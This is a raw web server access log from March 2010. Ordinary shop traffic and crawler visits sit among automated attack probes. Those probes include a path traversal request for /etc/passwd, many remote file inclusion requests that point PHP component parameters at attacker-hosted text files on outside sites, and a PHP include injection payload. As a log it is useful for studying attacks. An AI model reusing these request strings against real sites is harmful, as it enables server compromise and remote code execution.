193.136.242.3 - - [19/Mar/2010:01:03:54 -0400] "GET /logs/access_log.Q109121600/index.php?inc=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.816"
98.119.149.73 - - [19/Mar/2010:01:04:02 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT HTTP/1.1" 200 37999 "http://www.acesurgical.com/contact.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5"
209.59.12.99 - - [19/Mar/2010:01:04:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
98.119.149.73 - - [19/Mar/2010:01:04:06 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5"
95.108.128.242 - - [19/Mar/2010:01:03:29 -0400] "GET /logs/error_log.Q109102000 HTTP/1.1" 200 3642071 "-" "Yandex/1.01.001 (compatible; Win16; I)"
98.119.149.73 - - [19/Mar/2010:01:04:32 -0400] "GET /CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8 HTTP/1.1" 200 64811 "http://www.acesurgical.com/trufix_details.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5"
98.119.149.73 - - [19/Mar/2010:01:04:33 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5"
220.80.108.81 - - [19/Mar/2010:01:04:45 -0400] "GET /logs/access_log.Q109092100%20%20//snippet.reflect.php?reflect_base=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
220.80.108.81 - - [19/Mar/2010:01:04:46 -0400] "GET //snippet.reflect.php?reflect_base=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
220.80.108.81 - - [19/Mar/2010:01:04:46 -0400] "GET /logs//snippet.reflect.php?reflect_base=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
220.80.108.81 - - [19/Mar/2010:01:04:47 -0400] "GET /logs/access_log.Q109060200%20%20//snippet.reflect.php?reflect_base=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
98.119.149.73 - - [19/Mar/2010:01:04:51 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L5281BB5F18A8E8002E4502L+WSEQ(S0060):1+OUITEM(A0200):45418015 HTTP/1.1" 200 27013 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5"
98.119.149.73 - - [19/Mar/2010:01:04:52 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5"
192.58.52.252 - - [19/Mar/2010:01:04:57 -0400] "GET /logs/access_log.Q109121200//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sabong.es.kr/~sb2007/bbs/images/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
192.58.52.252 - - [19/Mar/2010:01:04:57 -0400] "GET /logs/access_log.Q109120500//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sabong.es.kr/~sb2007/bbs/images/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
98.119.149.73 - - [19/Mar/2010:01:05:29 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5"
98.119.149.73 - - [19/Mar/2010:01:05:30 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L5281BB5F1E1848002F7502L+M37+ENG HTTP/1.1" 200 47405 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5"
98.119.149.73 - - [19/Mar/2010:01:05:31 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5"
98.119.149.73 - - [19/Mar/2010:01:05:55 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L5281BB561A48C80063C502L+M37+ENG HTTP/1.1" 200 38012 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L5281BB5F1E1848002F7502L+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5"
98.119.149.73 - - [19/Mar/2010:01:05:56 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5"
66.249.65.53 - - [19/Mar/2010:01:05:58 -0400] "GET /images/store_implant_section.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
88.191.94.188 - - [19/Mar/2010:01:06:25 -0400] "GET /////administrator/components/com_jcs/jcs.php?msConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
88.191.94.188 - - [19/Mar/2010:01:06:25 -0400] "GET /logs/////administrator/components/com_jcs/jcs.php?msConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
88.191.94.188 - - [19/Mar/2010:01:06:25 -0400] "GET /logs/access_log.Q109062900%20%20/////administrator/components/com_jcs/jcs.php?msConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
88.191.94.188 - - [19/Mar/2010:01:06:27 -0400] "GET /////administrator/components/com_jcs/jcs.php?msConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
88.191.94.188 - - [19/Mar/2010:01:06:27 -0400] "GET /logs/////administrator/components/com_jcs/jcs.php?msConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
88.191.94.188 - - [19/Mar/2010:01:06:27 -0400] "GET /logs/access_log.Q109062900%20%20/////administrator/components/com_jcs/jcs.php?msConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
88.191.94.188 - - [19/Mar/2010:01:06:50 -0400] "GET /logs/error_log.Q109080500%20%20/////administrator/components/com_jcs/jcs.php?msConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
88.191.94.188 - - [19/Mar/2010:01:06:57 -0400] "GET /logs/error_log.Q109080500%20%20/////administrator/components/com_jcs/jcs.php?msConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
192.58.52.252 - - [19/Mar/2010:01:07:49 -0400] "GET /logs/access_log.Q109053100//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sabong.es.kr/~sb2007/bbs/images/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
192.58.52.252 - - [19/Mar/2010:01:08:49 -0400] "GET /logs/access_log.Q109120500//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sabong.es.kr/~sb2007/bbs/images/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
192.58.52.252 - - [19/Mar/2010:01:08:49 -0400] "GET /logs/access_log.Q109121200//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sabong.es.kr/~sb2007/bbs/images/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:09:39 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:09:39 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:09:39 -0400] "GET /logs/access_log.Q109122300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:09:44 -0400] "GET /logs/access_log.Q110021000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:09:50 -0400] "GET /logs/access_log.Q109122600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
67.195.114.252 - - [19/Mar/2010:01:09:15 -0400] "GET /logs/access_log.Q109112000 HTTP/1.0" 200 4313908 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
95.108.128.242 - - [19/Mar/2010:01:09:35 -0400] "GET /logs/access_log.Q109072400 HTTP/1.1" 200 3768784 "-" "Yandex/1.01.001 (compatible; Win16; I)"
219.240.39.222 - - [19/Mar/2010:01:10:10 -0400] "GET /logs//main.php?appserv_root=http://www.painkiller.de/CMS/modules/byz9991.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
219.240.39.222 - - [19/Mar/2010:01:10:10 -0400] "GET //main.php?appserv_root=http://www.painkiller.de/CMS/modules/byz9991.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
219.240.39.222 - - [19/Mar/2010:01:10:11 -0400] "GET /logs/access_log.Q109053000%20%20//main.php?appserv_root=http://www.painkiller.de/CMS/modules/byz9991.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:10:16 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:10:16 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:10:16 -0400] "GET /logs/access_log.Q109122300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:10:20 -0400] "GET /logs/access_log.Q110021000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:10:26 -0400] "GET /logs/access_log.Q109122600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
219.240.39.222 - - [19/Mar/2010:01:10:36 -0400] "GET /logs/access_log.Q109080600%20%20//main.php?appserv_root=http://www.painkiller.de/CMS/modules/byz9991.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
88.191.94.188 - - [19/Mar/2010:01:11:57 -0400] "GET /logs/access_log.Q109062900/////administrator/components/com_jcs/jcs.php?msConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Mar/2010:01:12:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.191.94.188 - - [19/Mar/2010:01:12:06 -0400] "GET /logs/error_log.Q109080500/////administrator/components/com_jcs/jcs.php?msConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
88.191.94.188 - - [19/Mar/2010:01:12:25 -0400] "GET /logs/access_log.Q109062900/////administrator/components/com_jcs/jcs.php?msConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
88.191.94.188 - - [19/Mar/2010:01:12:31 -0400] "GET /logs/error_log.Q109080500/////administrator/components/com_jcs/jcs.php?msConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:12:37 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:12:37 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:12:37 -0400] "GET /logs/access_log.Q110021000%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:12:42 -0400] "GET /logs/access_log.Q109122600%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:12:57 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:12:57 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:12:57 -0400] "GET /logs/access_log.Q110021000%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:13:02 -0400] "GET /logs/access_log.Q109122600%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
212.241.177.123 - - [19/Mar/2010:01:14:26 -0400] "GET /logs/access_log.Q109102300%20%20////bbs//////////good.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
212.241.177.123 - - [19/Mar/2010:01:14:26 -0400] "GET ////bbs//////////good.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
212.241.177.123 - - [19/Mar/2010:01:14:26 -0400] "GET /logs/access_log.Q109072700%20%20////bbs//////////good.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
212.241.177.123 - - [19/Mar/2010:01:14:26 -0400] "GET /logs////bbs//////////good.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
95.108.128.242 - - [19/Mar/2010:01:15:29 -0400] "GET /logs/error_log.Q109082900 HTTP/1.1" 200 3049575 "-" "Yandex/1.01.001 (compatible; Win16; I)"
195.9.14.88 - - [19/Mar/2010:01:16:08 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:16:08 -0400] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:16:08 -0400] "GET /logs/error_log.Q109073000%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:16:12 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:16:12 -0400] "GET /logs/access_log.Q109122300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:16:12 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:16:18 -0400] "GET /logs/error_log.Q109072600%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:16:46 -0400] "GET /logs/error_log.Q110030400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
216.121.63.153 - - [19/Mar/2010:01:17:26 -0400] "GET /logs/error_log.Q110030300%20%20/index2.php?ascii_seite=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.121.63.153 - - [19/Mar/2010:01:17:26 -0400] "GET /logs/access_log.Q110030300%20%20/index2.php?ascii_seite=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.121.63.153 - - [19/Mar/2010:01:17:26 -0400] "GET /index2.php?ascii_seite=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.121.63.153 - - [19/Mar/2010:01:17:26 -0400] "GET /logs/index2.php?ascii_seite=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
95.83.19.96 - - [19/Mar/2010:01:18:10 -0400] "GET /logs/access_log.Q109052400 HTTP/1.1" 200 2479154 "http://yandex.ru/yandsearch?p=1&text=http%3A%2F%2Fgorod.ks-bank.ru&clid=9403&lr=42" "Opera/9.80 (Windows NT 6.0; U; ru) Presto/2.2.15 Version/10.10"
216.121.63.153 - - [19/Mar/2010:01:18:58 -0400] "GET /logs/access_log.Q110030300/index2.php?ascii_seite=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.121.63.153 - - [19/Mar/2010:01:18:58 -0400] "GET /logs/error_log.Q110030300/index2.php?ascii_seite=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.121.63.153 - - [19/Mar/2010:01:19:02 -0400] "GET /index2.php?showpage=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.121.63.153 - - [19/Mar/2010:01:19:02 -0400] "GET /logs/index2.php?showpage=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.121.63.153 - - [19/Mar/2010:01:19:02 -0400] "GET /logs/access_log.Q109090600%20%20/index2.php?showpage=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.121.63.153 - - [19/Mar/2010:01:19:06 -0400] "GET /logs/access_log.Q110020100%20%20/index2.php?showpage=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
78.110.50.114 - - [19/Mar/2010:01:19:20 -0400] "GET /logs/access_log.Q109100700//main.php?sayfa=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
78.110.50.114 - - [19/Mar/2010:01:19:20 -0400] "GET //main.php?sayfa=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
78.110.50.114 - - [19/Mar/2010:01:19:20 -0400] "GET /logs//main.php?sayfa=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Mar/2010:01:20:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.251.189.4 - - [19/Mar/2010:01:20:41 -0400] "GET //download.php?board.skin.path=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:01:20:41 -0400] "GET /logs/access_log.Q110021600%20%20//download.php?board.skin.path=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:01:20:41 -0400] "GET /logs//download.php?board.skin.path=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
220.232.237.122 - - [19/Mar/2010:01:20:42 -0400] "GET //main.php?sayfa=http://www.mharmony.net/main//forum/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
220.232.237.122 - - [19/Mar/2010:01:20:42 -0400] "GET /logs//main.php?sayfa=http://www.mharmony.net/main//forum/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
220.232.237.122 - - [19/Mar/2010:01:20:42 -0400] "GET /logs/access_log.Q109100700//main.php?sayfa=http://www.mharmony.net/main//forum/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
78.110.50.114 - - [19/Mar/2010:01:20:50 -0400] "GET //main.php?sayfa=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
78.110.50.114 - - [19/Mar/2010:01:20:50 -0400] "GET /logs/access_log.Q109100700//main.php?sayfa=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
78.110.50.114 - - [19/Mar/2010:01:20:50 -0400] "GET /logs//main.php?sayfa=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:01:21:05 -0400] "GET /logs//download.php?board.skin.path=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:01:21:05 -0400] "GET //download.php?board.skin.path=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:01:21:05 -0400] "GET /logs/access_log.Q110021600%20%20//download.php?board.skin.path=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
216.121.63.153 - - [19/Mar/2010:01:21:20 -0400] "GET /logs/access_log.Q109090600/index2.php?showpage=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.121.63.153 - - [19/Mar/2010:01:21:20 -0400] "GET /logs/access_log.Q110020100/index2.php?showpage=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:01:21:21 -0400] "GET //download.php?board.skin.path=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:01:21:21 -0400] "GET /logs//download.php?board.skin.path=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:01:21:22 -0400] "GET /logs//download.php?board.skin.path=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:01:21:22 -0400] "GET /logs/access_log.Q110021600%20%20//download.php?board.skin.path=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:01:21:22 -0400] "GET //download.php?board.skin.path=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:01:21:22 -0400] "GET /logs/access_log.Q110021600%20%20//download.php?board.skin.path=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:01:21:26 -0400] "GET /logs//download.php?board.skin.path=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:01:21:26 -0400] "GET //download.php?board.skin.path=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:01:21:26 -0400] "GET /logs/access_log.Q110021600%20%20//download.php?board.skin.path=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:21:27 -0400] "GET /logs/access_log.Q109091800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:21:27 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:21:27 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:21:29 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:21:29 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:21:29 -0400] "GET /logs/access_log.Q109091800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
95.108.128.242 - - [19/Mar/2010:01:21:08 -0400] "GET /logs/access_log.Q109060900 HTTP/1.1" 200 4908335 "-" "Yandex/1.01.001 (compatible; Win16; I)"
